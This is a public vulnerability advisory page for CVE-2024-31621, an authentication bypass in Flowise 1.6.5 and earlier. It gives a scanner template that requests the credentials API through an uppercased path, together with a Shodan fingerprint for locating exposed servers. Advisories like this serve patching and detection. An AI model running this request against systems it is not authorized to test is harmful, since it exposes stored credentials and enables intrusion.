CVE-2024-31621: Flowise 1.6.5 - Authentication Bypass

2025-08-01 Flowise PoC Public

Description

The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.

PoC

id: CVE-2024-31621

info:
  name: Flowise 1.6.5 - Authentication Bypass
  author: DhiyaneshDK
  severity: high
  description: |
    The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.
  impact: |
    Attackers can bypass authentication and gain unauthorized access to the Flowise application and its data.
  remediation: |
    Update Flowise to version 1.6.6 or later.
  reference:
    - https://www.exploit-db.com/exploits/52001
    - https://github.com/FlowiseAI/Flowise/releases
    - https://flowiseai.com/
  classification:
    cve-id: CVE-2024-31621
    cwe-id: CWE-94
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
    cvss-score: 7.6
    epss-score: 0.59867
    epss-percentile: 0.99084
    cpe: cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-2051052918
  tags: cve,cve2024,auth-bypass,flowise,vuln,ai

http:
  - method: GET
    path:
      - "{{BaseURL}}/API/V1/credentials"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"credentialName":'
          - '"updatedDate":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204555319b967da0d350513963a9d1d6b687fc9d731b7f635d4430ffd1b39910b7022100d231ce247014f243ffc347562a48e8ee59d753502920044eaead42de3fac3d03:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities